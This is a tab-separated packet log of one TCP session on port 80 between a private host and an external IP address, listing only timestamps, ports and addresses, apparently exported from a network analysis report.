Nov 11, 2024 01:14:22.835071087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835103989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835139036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835150003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835161924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835181952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835187912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835192919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835210085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835211039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835223913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835237980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835241079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835254908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835266113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835266113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835279942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835294008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835300922 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835323095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835330963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835342884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835380077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835410118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835422039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835443974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835455894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835463047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835470915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835480928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835484028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835515976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835517883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835529089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835540056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835542917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835566044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835585117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835592031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835597992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835609913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835632086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835643053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835654974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835661888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835674047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835685968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835689068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835701942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835711956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835717916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835724115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835751057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835762024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835792065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835812092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835855961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835944891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835963011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835978031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835988045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835995913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836008072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836014032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836025000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836034060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836038113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836044073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836051941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836076975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836093903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836106062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836106062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836117983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836141109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836170912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836201906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836215019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836225986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836241007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836251974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836252928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836282015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836303949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836308002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836360931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836370945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836383104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836416960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836426020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836440086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836450100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836462021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836472988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836474895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836503983 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836515903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836530924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836541891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836553097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836576939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836610079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836633921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836647034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836662054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836684942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836718082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836724043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836740971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836751938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836762905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836766005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836777925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836786985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836788893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836802006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836811066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836815119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.836833954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.836862087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.837973118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.837985039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.837995052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.838012934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.838016987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.838036060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.838068008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.838958025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.838969946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.838985920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.838996887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839008093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839011908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839020014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839051008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839071989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839102983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839121103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839133978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839144945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839148998 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839160919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839167118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839174032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839185953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839200020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839202881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839211941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839224100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839225054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839248896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839260101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839260101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839272022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839283943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839291096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839294910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839303970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839308023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839330912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839343071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839346886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839355946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839366913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839369059 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839380026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839381933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839391947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839404106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839416981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839417934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839430094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839441061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.839447021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839473963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.839493036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.888079882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888181925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888192892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888204098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888216972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888227940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.888324022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.888324022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.888324022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922286034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922312021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922322989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922334909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922368050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922385931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922398090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922409058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922430038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922449112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.922493935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922493935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922494888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922494888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922524929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.922524929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.955682039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.955693960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.955707073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.955722094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.955734015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.955773115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.955931902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988384962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988408089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988428116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988440037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988456964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988457918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988468885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988478899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988481998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988493919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988500118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988504887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988517046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988518953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988531113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988542080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988560915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988562107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988578081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988584042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988589048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988605976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988610029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988617897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988631964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988636971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988648891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988651037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988661051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988665104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988677025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988684893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988689899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988697052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988718033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988735914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988817930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988830090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988840103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988850117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988862038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988862038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988874912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988889933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988893986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988905907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988909006 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988919020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988929987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988935947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988940954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.988962889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.988985062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989049911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989068985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989079952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989090919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989094019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989104033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989114046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989118099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989126921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989130020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989141941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989152908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989156008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989165068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989173889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989176989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989195108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989197016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989207029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989217997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989217997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989231110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989248037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989253044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989259958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989269972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989276886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989280939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989294052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989304066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989311934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989329100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989329100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989341974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989353895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989362001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989372015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989382029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989382029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989394903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989403009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989412069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989423037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989428997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989435911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989443064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989470005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989473104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989481926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989499092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989500999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989511013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989521980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989521980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989535093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989546061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989551067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989557981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989559889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989569902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989582062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989593029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989593029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989612103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989623070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989634991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989634991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989640951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989660025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989660978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989670992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989682913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989692926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989696980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989702940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989712954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989722967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.989729881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.989742041 CET	80	49762	185.215.113.16	192.168.2.4
